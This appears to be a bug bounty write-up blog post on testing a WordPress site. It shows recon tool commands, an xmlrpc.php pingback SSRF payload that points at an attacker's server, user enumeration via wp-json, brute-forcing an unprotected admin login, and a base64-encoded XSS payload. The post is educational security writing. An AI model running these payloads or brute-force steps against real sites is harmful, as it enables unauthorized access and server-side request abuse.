top of page
Writer's pictureNitin Yadav

Unleashing the Ethical Hacker Within: Cybersecurity Insights, Bug Bounty Tips, and the Art of Penetration Testing

Hello everyone, I hope you all are doing great.

I am back with another writeup.


It is a write-up about some of my findings so let's start.



This time a project came that has a very small scope and has only one URL inside it let's say www.victim.com.

Now for the first step, we started to gather all the information we could get.


So the First step was to determine the technologies and webserver for which we used wappalyzer.




Now lets locate some of the files like /robots.txt , /crossdomain.xml /clientaccesspolicy.xml /sitemap.xml and /.well-known/








So let's move to our next step which is Directory Enumeration and fuzzing for that, I use a bunch of tools.


hakrawler -domain https://victim.com/

gospider -s "https://victim.com/" -o output -c 10 -d 1

gospider -S sites.txt -o output -c 10 -d 1

gospider -s "https://victim.com/" -o output -c 10 -d 1 --other-source --include-subs

ffuf -recursion -mc all -ac -c -e .htm,.shtml,.php,.html,.js,.txt,.zip,.bak,.asp,.aspx,.xml -w OneListForAll/onelistforall.txt -u https://lvictim.com/FUZZ

gau victim.com | unfurl -u paths sed 's#/#\n#g' paths.txt |sort -u

gau victim.com | unfurl -u keys

gau victim.com | head -n 1000 |fff -s 200 -s 404


You can use many more.


From these I get a bunch of directories and files so let's start our exploit phase. We will discuss recon some other day.


Then from this, I got to know that the website was using WordPress. And now I started to look for all the vulnerabilities that can be present.


Lets discus them all


xmlrpc.php


To detect this you can just visit www.victim.com/xmlrpc.php and the page will show the error message of only accepting POST requests.



let's exploit this one


So first capture the request in Burp and change the method from GET to POST.





Now List the methods with


<methodCall> <methodName>system.listMethods</methodName> <params></params> </methodCall>




Perform SSRF with


<methodCall> <methodName>pingback.ping</methodName> <params><param> <value><string>http://<YOUR SERVER >:<port></string></value> </param><param><value><string>http://<Some Valid Location ></string> </value></param></params> </methodCall>


WP User Enumeration


On visiting www.victim.com/wp-json/wp/v2/users we were able to see the users




When you've got both xmlrpc.php and user enumeration at your disposal, it's like having a potent combination in your hacking arsenal. Picture this: you're not just limited to exploring user details through wp-json, but you can elevate your game by launching a strategic brute force attack via xmlrpc.php.


With xmlrpc.php, you're not just passively gathering information; you're actively engaging with the WordPress site, probing for vulnerabilities, and flexing your skills to potentially gain unauthorized access. And when you add user enumeration into the mix, it's like adding fuel to the fire, intensifying your efforts and magnifying the impact of your attack.


By chaining these two techniques together, you're not only demonstrating extra effort and sophistication, but you're also significantly increasing your chances of success. It's a thrilling endeavor, pushing the boundaries of what's possible in the realm of cybersecurity. So buckle up and get ready for an exhilarating ride as you embark on this exciting hacking adventure!


Admin Page Bruteforce


So no we got our users and from the content discovery, we got an admin page that was like.


Here we tried the username we got and tried to brute force and there was no brute force protection.


XSS


Now after these i thought of finding some more assets if i can and then i think of google dorking. I tried my tool which is now available on our website.




So by this, we got to know that the website was using a theme that is wahi. We tried xss there by base64 encoding that is www.victim.com/wahi=JzthbGVydCgxKTsvLw== and boom.



There were many other bugs but we will talk them in some other blog (This blog will become boring if we add more)

I hope you enjoy this one and learned something new.


 I see you next time 😉



Take care, happy hacking!









41 views0 comments

Comments


bottom of page